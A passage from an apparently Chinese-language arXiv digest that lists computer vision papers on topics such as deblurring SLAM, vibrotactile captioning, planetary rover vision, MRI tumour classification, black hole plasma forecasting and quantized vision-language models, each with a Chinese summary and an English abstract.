类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI); Machine Learning (cs.LG); Neurons and Cognition (q-bio.NC)
备注:
Abstract:Implicit neural representations (INRs) offer continuous coordinate-based encodings for atlas registration, cross-modality resampling, sparse-view completion, and compact sharing of neuroanatomical data. Yet reproducible evaluation is lacking for high-resolution larval zebrafish microscopy, where preserving neuropil boundaries and fine neuronal processes is critical. We present a reproducible INR benchmark for the MapZebrain larval zebrafish brain atlas. Using a unified, seed-controlled protocol, we compare SIREN, Fourier features, Haar positional encoding, and a multi-resolution grid on 950 grayscale microscopy images, including atlas slices and single-neuron projections. Images are normalized with per-image (1,99) percentiles estimated from 10% of pixels in non-held-out columns, and spatial generalization is tested with a deterministic 40% column-wise hold-out along the X-axis. Haar and Fourier achieve the strongest macro-averaged reconstruction fidelity on held-out columns (about 26 dB), while the grid is moderately behind. SIREN performs worse in macro averages but remains competitive on area-weighted micro averages in the all-in-one regime. SSIM and edge-focused error further show that Haar and Fourier preserve boundaries more accurately. These results indicate that explicit spectral and multiscale encodings better capture high-frequency neuroanatomical detail than smoother-bias alternatives. For MapZebrain workflows, Haar and Fourier are best suited to boundary-sensitive tasks such as atlas registration, label transfer, and morphology-preserving sharing, while SIREN remains a lightweight baseline for background modelling or denoising.
[CV-259] Unblur-SLAM: Dense Neural SLAM for Blurry Inputs CVPR2026
【速读】:该论文旨在解决在存在运动模糊(motion blur)和散焦模糊(defocus blur)的条件下,传统RGB SLAM系统难以实现高精度位姿估计与清晰三维重建的问题。其解决方案的关键在于提出了一种分阶段的去模糊SLAM框架——Unblur-SLAM:第一阶段采用前馈式图像去模糊模型对输入帧进行初步处理,通过针对性训练策略提升跟踪与建图模块性能;若去模糊成功,则利用局部-全局多视图优化与回环检测获得精化位姿与深度信息;若失败,则直接基于全局3D高斯表示(3DGS)结合额外的模糊网络建模多个模糊子帧,并模拟模糊形成过程以学习锐利细节及子帧位姿,从而实现鲁棒且高质量的重建结果。
链接: https://arxiv.org/abs/2603.26810
作者: Qi Zhang,Denis Rozumny,Francesco Girlanda,Sezer Karaoglu,Marc Pollefeys,Theo Gevers,Martin R. Oswald
机构: University of Amsterdam (阿姆斯特丹大学); ETH Zürich (苏黎世联邦理工学院); Meta Reality Labs (Meta现实实验室)
类目: Computer Vision and Pattern Recognition (cs.CV); Image and Video Processing (eess.IV)
备注: 14 pages, 9 figures (based on the document’s total length and the final Figure 9 ). Accepted By CVPR 2026
Abstract:We propose Unblur-SLAM, a novel RGB SLAM pipeline for sharp 3D reconstruction from blurred image inputs. In contrast to previous work, our approach is able to handle different types of blur and demonstrates state-of-the-art performance in the presence of both motion blur and defocus blur. Moreover, we adjust the computation effort with the amount of blur in the input image. As a first stage, our method uses a feed-forward image deblurring model for which we propose a suitable training scheme that can improve both tracking and mapping modules. Frames that are successfully deblurred by the feed-forward network obtain refined poses and depth through local-global multi-view optimization and loop closure. Frames that fail the first stage deblurring are directly modeled through the global 3DGS representation and an additional blur network to model multiple blurred sub-frames and simulate the blur formation process in 3D space, thereby learning sharp details and refined sub-frame poses. Experiments on several real-world datasets demonstrate consistent improvements in both pose estimation and sharp reconstruction results of geometry and texture.
[CV-260] he Language of Touch: Translating Vibrations into Text with Dual-Branch Learning
【速读】:该论文旨在解决触觉信号(vibrotactile signals)的语义理解难题,特别是首次提出触觉描述生成(vibrotactile captioning)任务,即从触觉信号中生成自然语言描述。其核心挑战在于触觉数据具有混合周期-非周期结构且缺乏空间语义信息。解决方案的关键是提出ViPAC(Vibrotactile Periodic-Aperiodic Captioning)方法:采用双分支架构分离周期与非周期成分,并引入动态融合机制实现特征自适应整合;同时设计正交性约束与加权正则化策略,确保特征互补性和融合一致性,从而显著提升描述的词汇准确性和语义对齐度。
链接: https://arxiv.org/abs/2603.26804
作者: Jin Chen,Yifeng Lin,Chao Zeng,Si Wu,Tiesong Zhao
机构: Fuzhou University (福州大学); Fujian Science and Technology Innovation Laboratory for Optoelectronic Information of China (福建省光电信息科技创新实验室); Hubei University (湖北大学); South China University of Technology (华南理工大学)
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注: 9 pages, 6 figures
Abstract:The standardization of vibrotactile data by IEEE P1918.1 workgroup has greatly advanced its applications in virtual reality, human-computer interaction and embodied artificial intelligence. Despite these efforts, the semantic interpretation and understanding of vibrotactile signals remain an unresolved challenge. In this paper, we make the first attempt to address vibrotactile captioning, \it i.e., generating natural language descriptions from vibrotactile signals. We propose Vibrotactile Periodic-Aperiodic Captioning (ViPAC), a method designed to handle the intrinsic properties of vibrotactile data, including hybrid periodic-aperiodic structures and the lack of spatial semantics. Specifically, ViPAC employs a dual-branch strategy to disentangle periodic and aperiodic components, combined with a dynamic fusion mechanism that adaptively integrates signal features. It also introduces an orthogonality constraint and weighting regularization to ensure feature complementarity and fusion consistency. Additionally, we construct LMT108-CAP, the first vibrotactile-text paired dataset, using GPT-4o to generate five constrained captions per surface image from the popular LMT-108 dataset. Experiments show that ViPAC significantly outperforms the baseline methods adapted from audio and image captioning, achieving superior lexical fidelity and semantic alignment.
[CV-261] Deep Learning Aided Vision System for Planetary Rovers
【速读】:该论文旨在解决行星探测车在复杂月面环境中实现高精度实时感知与离线地形重建的协同问题,以支持自主导航与任务规划。解决方案的关键在于构建一个融合实时感知与离线重建的双模块视觉系统:实时模块利用CLAHE增强的立体图像、YOLOv11n目标检测模型和神经网络估计物体距离,提供可靠的度量基准;离线模块则基于Depth Anything V2单目深度估计模型生成深度图,并通过Open3D融合为密集点云,从而实现高质量的地形重构。该架构在保证计算效率的同时,显著提升了月面场景下的感知精度与鲁棒性,尤其在灰度 lunar 场景中保持了良好的检测性能与深度估计准确性(中位数误差仅2.26 cm,在1–10米范围内)。
链接: https://arxiv.org/abs/2603.26802
作者: Lomash Relia,Jai G Singla,Amitabh,Nitant Dube
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV); Robotics (cs.RO); Image and Video Processing (eess.IV)
备注:
Abstract:This study presents a vision system for planetary rovers, combining real-time perception with offline terrain reconstruction. The real-time module integrates CLAHE enhanced stereo imagery, YOLOv11n based object detection, and a neural network to estimate object distances. The offline module uses the Depth Anything V2 metric monocular depth estimation model to generate depth maps from captured images, which are fused into dense point clouds using Open3D. Real world distance estimates from the real time pipeline provide reliable metric context alongside the qualitative reconstructions. Evaluation on Chandrayaan 3 NavCam stereo imagery, benchmarked against a CAHV based utility, shows that the neural network achieves a median depth error of 2.26 cm within a 1 to 10 meter range. The object detection model maintains a balanced precision recall tradeoff on grayscale lunar scenes. This architecture offers a scalable, compute-efficient vision solution for autonomous planetary exploration.
[CV-262] PhyDCM: A Reproducible Open-Source Framework for AI-Assisted Brain Tumor Classification from Multi-Sequence MRI
【速读】:该论文旨在解决医学影像诊断中因数据量快速增长而带来的传统方法效率低下问题,以及现有深度学习解决方案因封闭架构导致的可复现性差和学术发展受限的问题。其关键解决方案是提出一个开源软件框架PhyDCM,该框架采用基于MedViT的混合分类架构,集成标准化DICOM处理流程与交互式桌面可视化界面,并通过模块化设计将计算逻辑与图形界面分离,从而实现组件的独立修改与扩展;同时,通过标准化预处理(如强度重缩放和有限数据增强)确保不同MRI采集条件下的一致性,实验表明其在多个公开数据集上均能稳定达到93%以上的分类准确率,为可复现的AI驱动医学图像分析提供了坚实基础。
链接: https://arxiv.org/abs/2603.26794
作者: Hayder Saad Abdulbaqi,Mohammed Hadi Rahim,Mohammed Hassan Hadi,Haider Ali Aboud,Ali Hussein Allawi
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注: 18 pages, 9 figures, 6 tables
Abstract:MRI-based medical imaging has become indispensable in modern clinical diagnosis, particularly for brain tumor detection. However, the rapid growth in data volume poses challenges for conventional diagnostic approaches. Although deep learning has shown strong performance in automated classification, many existing solutions are confined to closed technical architectures, limiting reproducibility and further academic development. PhyDCM is introduced as an open-source software framework that integrates a hybrid classification architecture based on MedViT with standardized DICOM processing and an interactive desktop visualization interface. The system is designed as a modular digital library that separates computational logic from the graphical interface, allowing independent modification and extension of components. Standardized preprocessing, including intensity rescaling and limited data augmentation, ensures consistency across varying MRI acquisition settings. Experimental evaluation on MRI datasets from BRISC2025 and curated Kaggle collections (FigShare, SARTAJ, and Br35H) demonstrates stable diagnostic performance, achieving over 93% classification accuracy across categories. The framework supports structured, exportable outputs and multi-planar reconstruction of volumetric data. By emphasizing transparency, modularity, and accessibility, PhyDCM provides a practical foundation for reproducible AI-driven medical image analysis, with flexibility for future integration of additional imaging modalities.
[CV-263] Elucidating the Design Space of Flow Matching for Cellular Microscopy
【速读】:该论文旨在解决生成式 AI (Generative AI) 在模拟细胞对生物扰动响应时的模型设计问题,特别是针对基于流匹配(flow matching)的生成模型在细胞显微图像建模中的设计空间探索不足、部分常用技术冗余甚至损害性能的问题。解决方案的关键在于系统性地分析并简化模型架构,提出一个简单、稳定且可扩展的训练配方(recipe),通过将模型规模扩大两个数量级,显著提升生成质量(FID降低两倍,KID提升十倍),并在引入预训练分子嵌入(pre-trained molecular embeddings)后实现对未见分子响应的最优模拟性能。
链接: https://arxiv.org/abs/2603.26790
作者: Charles Jones,Emmanuel Noutahi,Jason Hartford,Cian Eastwood
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Flow-matching generative models are increasingly used to simulate cell responses to biological perturbations. However, the design space for building such models is large and underexplored. We systematically analyse the design space of flow matching models for cell-microscopy images, finding that many popular techniques are unnecessary and can even hurt performance. We develop a simple, stable, and scalable recipe which we use to train our foundation model. We scale our model to two orders of magnitude larger than prior methods, achieving a two-fold FID and ten-fold KID improvement over prior methods. We then fine-tune our model with pre-trained molecular embeddings to achieve state-of-the-art performance simulating responses to unseen molecules. Code is available at this https URL Subjects: Computer Vision and Pattern Recognition (cs.CV) Cite as: arXiv:2603.26790 [cs.CV] (or arXiv:2603.26790v1 [cs.CV] for this version) https://doi.org/10.48550/arXiv.2603.26790 Focus to learn more arXiv-issued DOI via DataCite (pending registration)
[CV-264] Confidence Matters: Uncertainty Quantification and Precision Assessment of Deep Learning-based CMR Biomarker Estimates Using Scan-rescan Data
【速读】:该论文旨在解决深度学习(Deep Learning, DL)方法在心脏功能生物标志物估计中仅依赖准确度(accuracy)评估而忽视精度(precision)的问题。其关键解决方案在于引入不确定性估计技术,包括深度集成(deep ensemble)、测试时增强(test-time augmentation)和蒙特卡洛丢弃(Monte Carlo dropout),并提出基于分布的新指标来评估生物标志物的扫描-重扫一致性(scan-rescan agreement)。结果表明,尽管点估计精度较高(平均Dice系数87%),但分布分析揭示了信心区间重叠率仅为50%的情况在不足45%的病例中出现,且统计相似性检验显示超过65%的病例存在显著差异,说明单纯依赖点估计会高估模型性能,需采用更全面的分布级指标以真实反映模型的精度表现。
链接: https://arxiv.org/abs/2603.26789
作者: Dewmini Hasara Wickremasinghe,Michelle Gibogwe,Andrew Bell,Esther Puyol-Antón,Muhummad Sohaib Nazir,Reza Razavi,Bruno Paun,Paul Aljabar,Andrew P. King
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:The performance of deep learning (DL) methods for the analysis of cine cardiovascular magnetic resonance (CMR) is typically assessed in terms of accuracy, overlooking precision. In this work, uncertainty estimation techniques, namely deep ensemble, test-time augmentation, and Monte Carlo dropout, are applied to a state-of-the-art DL pipeline for cardiac functional biomarker estimation, and new distribution-based metrics are proposed for the assessment of biomarker precision. The model achieved high accuracy (average Dice 87%) and point estimate precision on two external validation scan-rescan CMR datasets. However, distribution-based metrics showed that the overlap between scan/rescan confidence intervals was 50% in less than 45% of the cases. Statistical similarity tests between scan and rescan biomarkers also resulted in significant differences for over 65% of the cases. We conclude that, while point estimate metrics might suggest good performance, distributional analyses reveal lower precision, highlighting the need to use more representative metrics to assess scan-rescan agreement.
[CV-265] ReMemNav: A Rethinking and Memory-Augmented Framework for Zero-Shot Object Navigation
【速读】:该论文旨在解决零样本目标导航(zero-shot object navigation)任务中的关键挑战,即在无先验地图或任务特定训练的情况下,让智能体在陌生环境中定位未见过的目标物体。当前基于视觉语言模型(VLMs)的方法仍面临空间幻觉、局部探索死锁以及高层语义意图与低层控制脱节等问题。解决方案的核心在于提出一种名为ReMemNav的分层导航框架,其关键创新包括:引入Recognize Anything Model(RAM)以锚定VLM的空间推理过程;设计基于情景记忆缓冲队列的自适应双模态重思考机制,通过历史记忆主动验证目标可见性并纠正决策,从而避免死锁;同时利用深度掩码提取可行动作序列,使VLM能够选择最优动作映射为实际空间移动,显著提升导航成功率(SR)和路径长度归一化成功率(SPL)。
链接: https://arxiv.org/abs/2603.26788
作者: Feng Wu,Wei Zuo,Wenliang Yang,Jun Xiao,Yang Liu,Xinhua Zeng
机构: Fudan University (复旦大学); Tongji University (同济大学)
类目: Robotics (cs.RO); Computer Vision and Pattern Recognition (cs.CV)
备注: 8 pages, 5 figures
Abstract:Zero-shot object navigation requires agents to locate unseen target objects in unfamiliar environments without prior maps or task-specific training which remains a significant challenge. Although recent advancements in vision-language models(VLMs) provide promising commonsense reasoning capabilities for this task, these models still suffer from spatial hallucinations, local exploration deadlocks, and a disconnect between high-level semantic intent and low-level control. In this regard, we propose a novel hierarchical navigation framework named ReMemNav, which seamlessly integrates panoramic semantic priors and episodic memory with VLMs. We introduce the Recognize Anything Model to anchor the spatial reasoning process of the VLM. We also design an adaptive dual-modal rethinking mechanism based on an episodic semantic buffer queue. The proposed mechanism actively verifies target visibility and corrects decisions using historical memory to prevent deadlocks. For low-level action execution, ReMemNav extracts a sequence of feasible actions using depth masks, allowing the VLM to select the optimal action for mapping into actual spatial movement. Extensive evaluations on HM3D and MP3D demonstrate that ReMemNav outperforms existing training-free zero-shot baselines in both success rate and exploration efficiency. Specifically, we achieve significant absolute performance improvements, with SR and SPL increasing by 1.7% and 7.0% on HM3D v0.1, 18.2% and 11.1% on HM3D v0.2, and 8.7% and 7.9% on MP3D.
[CV-266] Brain-Inspired Multimodal Spiking Neural Network for Image-Text Retrieval
【速读】:该论文旨在解决多模态应用中构建低功耗、高性能脉冲神经网络(Spiking Neural Networks, SNNs)的挑战,特别是在图像-文本检索(Image-Text Retrieval, ITR)任务中,现有基于人工神经网络(Artificial Neural Networks, ANNs)的方法往往过度追求单模态语义丰富性,而忽视了跨模态交互、检索延迟和能效问题。其解决方案的关键在于提出一种受大脑启发的跨模态脉冲融合网络(Cross-Modal Spike Fusion network, CMSF),通过在脉冲层面直接融合双模态特征,生成增强的多模态表示作为软监督信号,以优化单模态脉冲嵌入,从而有效缓解语义损失;该机制仅需两个时间步即可实现顶尖检索精度,显著优于当前最先进的ANN方法,同时保持极低能耗与高检索速度。
链接: https://arxiv.org/abs/2603.26787
作者: Xintao Zong,Xian Zhong,Wenxuan Liu,Jianhao Ding,Zhaofei Yu,Tiejun Huang
机构: Wuhan University of Technology (武汉理工大学); Peking University (北京大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Spiking neural networks (SNNs) have recently shown strong potential in unimodal visual and textual tasks, yet building a directly trained, low-energy, and high-performance SNN for multimodal applications such as image-text retrieval (ITR) remains highly challenging. Existing artificial neural network (ANN)-based methods often pursue richer unimodal semantics using deeper and more complex architectures, while overlooking cross-modal interaction, retrieval latency, and energy efficiency. To address these limitations, we present a brain-inspired Cross-Modal Spike Fusion network (CMSF) and apply it to ITR for the first time. The proposed spike fusion mechanism integrates unimodal features at the spike level, generating enhanced multimodal representations that act as soft supervisory signals to refine unimodal spike embeddings, effectively mitigating semantic loss within CMSF. Despite requiring only two time steps, CMSF achieves top-tier retrieval accuracy, surpassing state-of-the-art ANN counterparts while maintaining exceptionally low energy consumption and high retrieval speed. This work marks a significant step toward multimodal SNNs, offering a brain-inspired framework that unifies temporal dynamics with cross-modal alignment and provides new insights for future spiking-based multimodal research. The code is available at this https URL.
[CV-267] HighlightBench: Benchmarking Markup-Driven Table Reasoning in Scientific Documents
【速读】:该论文旨在解决多模态大语言模型(Multimodal Large Language Models, MLLMs)在处理以表格为中心的文档时,对视觉标记(如高亮、下划线和加粗等)作为显式逻辑指令的理解能力不足的问题。现有评估方法无法区分模型是未能识别标记,还是虽识别但未能将其纳入符号推理过程,从而导致对“标记驱动”表理解行为的评估存在盲区。解决方案的关键在于提出HighlightBench——一个诊断性基准测试,将评估任务细分为五类:标记定位(Markup Grounding)、约束检索(Constrained Retrieval)、局部关系(Local Relations)、聚合与比较(Aggregation \ Comparison)以及一致性与缺失性(Consistency \ Missingness),并提供一个参考流水线以显式化中间决策步骤,实现可复现的基线及沿感知到执行链路的误差归因分析。
链接: https://arxiv.org/abs/2603.26784
作者: Lexin Wang,Shenghua Liu,Yiwei Wang,Yujun Cai,Yuyao Ge,Jiayu Yao,Jiafeng Guo,Xueqi Cheng
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Visual markups such as highlights, underlines, and bold text are common in table-centric documents. Although multimodal large language models (MLLMs) have made substantial progress in document understanding, their ability to treat such cues as explicit logical directives remains under-explored. More importantly, existing evaluations cannot distinguish whether a model fails to see the markup or fails to reason with it. This creates a key blind spot in assessing markup-conditioned behavior over tables. To address this gap, we introduce HighlightBench, a diagnostic benchmark for markup-driven table understanding that decomposes evaluation into five task families: Markup Grounding, Constrained Retrieval, Local Relations, Aggregation \ Comparison, and Consistency \ Missingness. We further provide a reference pipeline that makes intermediate decisions explicit, enabling reproducible baselines and finer-grained attribution of errors along the perception-to-execution chain. Experiments show that even strong models remain unstable when visual cues must be consistently aligned with symbolic reasoning under structured output constraints.
[CV-268] Can We Change the Stroke Size for Easier Diffusion?
【速读】:该论文旨在解决扩散模型(Diffusion Models)在低信噪比(low signal-to-noise)条件下性能受限的问题,即在高噪声干扰下进行像素级预测时难以有效学习。其核心解决方案在于引入“笔触尺寸控制”(stroke-size control)作为可控干预手段,通过调节监督目标、预测结果和扰动在不同时间步上的有效粗糙度(effective roughness),从而缓解低信噪比带来的挑战。该方法在理论上和实验上均验证了其优势与权衡关系。
链接: https://arxiv.org/abs/2603.26783
作者: Yunwei Bai,Ying Kiat Tan,Yao Shu,Tsuhan Chen
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注:
Abstract:Diffusion models can be challenged in the low signal-to-noise regime, where they have to make pixel-level predictions despite the presence of high noise. The geometric intuition is akin to using the finest stroke for oil painting throughout, which may be ineffective. We therefore study stroke-size control as a controlled intervention that changes the effective roughness of the supervised target, predictions and perturbations across timesteps, in an attempt to ease the low signal-to-noise challenge. We analyze the advantages and trade-offs of the intervention both theoretically and empirically. Code will be released.
[CV-269] RatSeizure: A Benchmark and Saliency-Context Transformer for Rat Seizure Localization
【速读】:该论文旨在解决动物模型(尤其是大鼠)在癫痫发生机制研究和治疗反应评估中,因缺乏精确时间标注的公开数据集及标准化评估协议而导致的研究进展受限问题。现有动物行为数据集普遍存在可访问性差、标签粗粒度以及临床有意义事件的时间定位不充分等缺陷。为此,作者提出了RatSeizure数据集,这是首个面向细粒度癫痫行为分析的公开基准,包含带有癫痫相关动作单元和时间边界的视频片段标注,支持行为分类与时间定位任务。解决方案的关键在于引入RaSeformer——一种基于注意力机制的显著性-上下文Transformer架构,能够有效突出与行为相关的上下文信息并抑制冗余线索,在RatSeizure上的实验表明其性能优越,为该挑战性任务提供了具有竞争力的参考模型,并建立了标准化的数据划分与评估协议以促进可复现的基准测试。
链接: https://arxiv.org/abs/2603.26780
作者: Ting Yu Tsai,An Yu,Lucy Lee,Felix X.-F. Ye,Damian S. Shin,Tzu-Jen Kao,Xin Li,Ming-Ching Chang
机构: University at Albany, SUNY (纽约州立大学阿尔巴尼分校); University of Louisville (路易斯维尔大学); GE HealthCare (GE健康 care)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Animal models, particularly rats, play a critical role in seizure research for studying epileptogenesis and treatment response. However, progress is limited by the lack of datasets with precise temporal annotations and standardized evaluation protocols. Existing animal behavior datasets often have limited accessibility, coarse labeling, and insufficient temporal localization of clinically meaningful events. To address these limitations, we introduce RatSeizure, the first publicly benchmark for fine-grained seizure behavior analysis. The dataset consists of recorded clips annotated with seizure-related action units and temporal boundaries, enabling both behavior classification and temporal localization. We further propose RaSeformer, a saliency-context Transformer for temporal action localization that highlights behavior-relevant context while suppressing redundant cues. Experiments on RatSeizure show that RaSeformer achieves strong performance and provides a competitive reference model for this challenging task. We also establish standardized dataset splits and evaluation protocols to support reproducible benchmarking.
[CV-270] Limits of Imagery Reasoning in Frontier LLM Models
【速读】:该论文旨在解决大语言模型(Large Language Models, LLMs)在空间推理任务中表现不佳的问题,特别是涉及心理模拟(如心理旋转)的能力不足。其核心解决方案是引入一个外部“意象模块”(Imagery Module),该模块能够渲染和旋转3D模型,作为LLM的“认知假体”以增强其空间操作能力。关键在于通过双模块架构让推理模块(多模态大语言模型,MLLM)与意象模块协同工作,从而将3D状态维护与操作从LLM中剥离,但实验结果表明系统性能仍受限于LLM缺乏基础的视觉-空间原语,包括低层次的空间信号感知能力(如深度、运动及短时动态预测)以及对图像进行反思性推理、动态调整视觉焦点并融合意象与符号信息的能力。
链接: https://arxiv.org/abs/2603.26779
作者: Sergio Y. Hayashi,Nina S. T. Hirata
机构: Institute of Mathematics and Statistics – University of São Paulo(圣保罗大学数学与统计研究所)
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注: 25 pages
Abstract:Large Language Models (LLMs) have demonstrated impressive reasoning capabilities, yet they struggle with spatial tasks that require mental simulation, such as mental rotation. This paper investigates whether equipping an LLM with an external Imagery Module'' -- a tool capable of rendering and rotating 3D models -- can bridge this gap, functioning as a cognitive prosthetic.‘’ We conducted experiments using a dual-module architecture in which a reasoning module (an MLLM) interacts with an imagery module on 3D model rotation tasks. Performance was lower than expected, with accuracy reaching at most 62.5%. Further investigation suggests that even when the burden of maintaining and manipulating a holistic 3D state is outsourced, the system still fails. This reveals that current frontier models lack the foundational visual-spatial primitives required to interface with imagery. Specifically, they lack: (1) the low-level sensitivity to extract spatial signals such as (a) depth, (b) motion, and © short-horizon dynamic prediction; and (2) the capacity to reason contemplatively over images, dynamically shifting visual focus and balancing imagery with symbolic and associative information.
[CV-271] BHCast: Unlocking Black Hole Plasma Dynamics from a Single Blurry Image with Long-Term Forecasting CVPR2026
【速读】:该论文旨在解决从分辨率受限的观测数据(如事件视界望远镜 EHT 所获取的模糊图像)中推断黑洞性质及其吸积等离子体动力学的问题。传统数值模拟虽能提供准确的动力学信息,但计算成本高且难以用于实时推理,形成瓶颈。解决方案的关键在于提出 BHCast 框架,其核心是一个神经网络模型,能够将单张模糊静态图像转化为未来多帧高分辨率动态序列,通过多尺度金字塔损失函数实现自回归预测的同时完成超分辨率重建与长期稳定演化;进一步结合梯度提升树模型从提取的时空特征(如模式速度和螺旋角)中反演黑洞性质(如自旋和视角倾角),从而实现模块化、可解释且具备不确定性量化能力的逆问题求解方法。
链接: https://arxiv.org/abs/2603.26777
作者: Renbo Tu,Ali SaraerToosi,Nicholas S. Conroy,Gennady Pekhimenko,Aviad Levis
机构: University of Toronto (多伦多大学); Vector Institute (向量研究所); University of Illinois at Urbana-Champaign (伊利诺伊大学厄巴纳-香槟分校); NVIDIA (英伟达)
类目: Computer Vision and Pattern Recognition (cs.CV); Instrumentation and Methods for Astrophysics (astro-ph.IM); Machine Learning (cs.LG)
备注: CVPR 2026
Abstract:The Event Horizon Telescope (EHT) delivered the first image of a black hole by capturing the light from its surrounding accretion flow, revealing structure but not dynamics. Simulations of black hole accretion dynamics are essential for interpreting EHT images but costly to generate and impractical for inference. Motivated by this bottleneck, BHCast presents a framework for forecasting black hole plasma dynamics from a single, blurry snapshot, such as those captured by the EHT. At its core, BHCast is a neural model that transforms a static image into forecasted future frames, revealing the underlying dynamics hidden within one snapshot. With a multi-scale pyramid loss, we demonstrate how autoregressive forecasting can simultaneously super-resolve and evolve a blurry frame into a coherent, high-resolution movie that remains stable over long time horizons. From forecasted dynamics, we can then extract interpretable spatio-temporal features, such as pattern speed (rotation rate) and pitch angle. Finally, BHCast uses gradient-boosting trees to recover black hole properties from these plasma features, including the spin and viewing inclination angle. The separation between forecasting and inference provides modular flexibility, interpretability, and robust uncertainty quantification. We demonstrate the effectiveness of BHCast on simulations of two distinct black hole accretion systems, Sagittarius A* and M87*, by testing on simulated frames blurred to EHT resolution and real EHT images of M87*. Ultimately, our methodology establishes a scalable paradigm for solving inverse problems, demonstrating the potential of learned dynamics to unlock insights from resolution-limited scientific data.
[CV-272] From Prediction to Diagnosis: Reasoning -Aware AI for Photovoltaic Defect Inspection
【速读】:该论文旨在解决光伏缺陷识别中现有计算机视觉系统缺乏可解释性与诊断深度的问题,这些问题限制了其在高风险能源基础设施中的可信应用。解决方案的关键在于提出REVL-PV框架,该框架通过融合电致发光(electroluminescence)、热成像和可见光图像的多模态学习,并强制模型在分类前将视觉证据与合理的缺陷机理进行关联,从而生成符合专业光伏检测实践的结构化诊断报告。这一基于推理感知的多模态学习范式显著提升了模型的准确性(93%分类准确率)与鲁棒性,同时实现了与专业检测专家评估的高度语义一致性。
链接: https://arxiv.org/abs/2603.26776
作者: Dev Mistry,Feng Qiu,Bo Chen,Feng Liu,Can Chen,Mohammad Shahidehpour,Ren Wang
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: 34 pages, 5 figures
Abstract:Reliable photovoltaic defect identification is essential for maintaining energy yield, ensuring warranty compliance, and enabling scalable inspection of rapidly expanding solar fleets. Although recent advances in computer vision have improved automated defect detection, most existing systems operate as opaque classifiers that provide limited diagnostic insight for high-stakes energy infrastructure. Here we introduce REVL-PV, a vision-language framework that embeds domain-specific diagnostic reasoning into multimodal learning across electroluminescence, thermal, and visible-light imagery. By requiring the model to link visual evidence to plausible defect mechanisms before classification, the framework produces structured diagnostic reports aligned with professional photovoltaic inspection practice. Evaluated on 1,927 real-world modules spanning eight defect categories, REVL-PV achieves 93% classification accuracy while producing interpretable diagnostic rationales and maintaining strong robustness under realistic image corruptions. A blind concordance study with a certified solar inspection expert shows strong semantic alignment between model explanations and expert assessments across defect identification, root-cause attribution, and visual descriptions. These results demonstrate that reasoning-aware multimodal learning establishes a general paradigm for trustworthy AI-assisted inspection of photovoltaic energy infrastructure.
[CV-273] From Content to Audience: A Multimodal Annotation Framework for Broadcast Television Analytics
【速读】:该论文旨在解决广播电视新闻内容自动化语义标注的难题,其核心挑战在于融合结构化的音视频组成、领域特定的编辑模式以及严格的运行约束。解决方案的关键在于构建一个针对意大利广播新闻场景的专用基准数据集,并系统评估两种不同流水线架构在九种前沿多模态大语言模型(Multimodal Large Language Models, MLLMs)上的表现,同时采用逐步增强的输入策略(包括视觉信号、自动语音识别、说话人分离和元数据)。实验表明,视频输入带来的性能提升具有显著的模型依赖性:大型模型能有效利用时间连续性,而小型模型在扩展多模态上下文时则因token过载出现性能下降。最终,所选最优流水线部署于14个完整广播节目,实现分钟级标注与标准化受众测量数据的集成,验证了该框架在基于内容的受众分析中的可操作性。
链接: https://arxiv.org/abs/2603.26772
作者: Paolo Cupini,Francesco Pierri
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI); Computers and Society (cs.CY)
备注:
Abstract:Automated semantic annotation of broadcast television content presents distinctive challenges, combining structured audiovisual composition, domain-specific editorial patterns, and strict operational constraints. While multimodal large language models (MLLMs) have demonstrated strong general-purpose video understanding capabilities, their comparative effectiveness across pipeline architectures and input configurations in broadcast-specific settings remains empirically undercharacterized. This paper presents a systematic evaluation of multimodal annotation pipelines applied to broadcast television news in the Italian setting. We construct a domain-specific benchmark of clips labeled across four semantic dimensions: visual environment classification, topic classification, sensitive content detection, and named entity recognition. Two different pipeline architectures are evaluated across nine frontier models, including Gemini 3.0 Pro, LLaMA 4 Maverick, Qwen-VL variants, and Gemma 3, under progressively enriched input strategies combining visual signals, automatic speech recognition, speaker diarization, and metadata. Experimental results demonstrate that gains from video input are strongly model-dependent: larger models effectively leverage temporal continuity, while smaller models show performance degradation under extended multimodal context, likely due to token overload. Beyond benchmarking, the selected pipeline is deployed on 14 full broadcast episodes, with minute-level annotations integrated with normalized audience measurement data provided by an Italian media company. This integration enables correlational analysis of topic-level audience sensitivity and generational engagement divergence, demonstrating the operational viability of the proposed framework for content-based audience analytics.
[CV-274] Quantized Vision-Language Models for Damage Assessment: A Comparative Study of LLaVA-1.5-7B Quantization Levels
【速读】:该论文旨在解决桥梁基础设施损伤自动评估中人工检测效率低、成本高的问题,核心挑战在于如何在保证损伤描述质量的前提下,实现模型在消费级GPU上的高效部署。解决方案的关键在于构建一个端到端的量化视觉-语言模型(VLM)流程,采用LLaVA-1.5-7B进行视觉损伤分析与结构化JSON提取,并引入基于规则的优先级评分机制;同时通过系统性比较Q4_K_M、Q5_K_M和Q8_0三种量化级别,在254张钢筋暴露图像上验证发现,Q5_K_M在损伤类型识别与严重程度分类等质量指标(平均3.18/5.0)和推理效率(5.67秒/图像)之间取得最优平衡——相比Q4_K_M提升8.5%质量且仅损失4.5%速度,同时达到Q8_0的质量水平但推理速度加快25%,且其文本质量相关性最低(-0.148),表明性能稳定不受描述长度影响。
链接: https://arxiv.org/abs/2603.26770
作者: Takato Yasuno
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: 16 pages, 4 figures, 8 tables
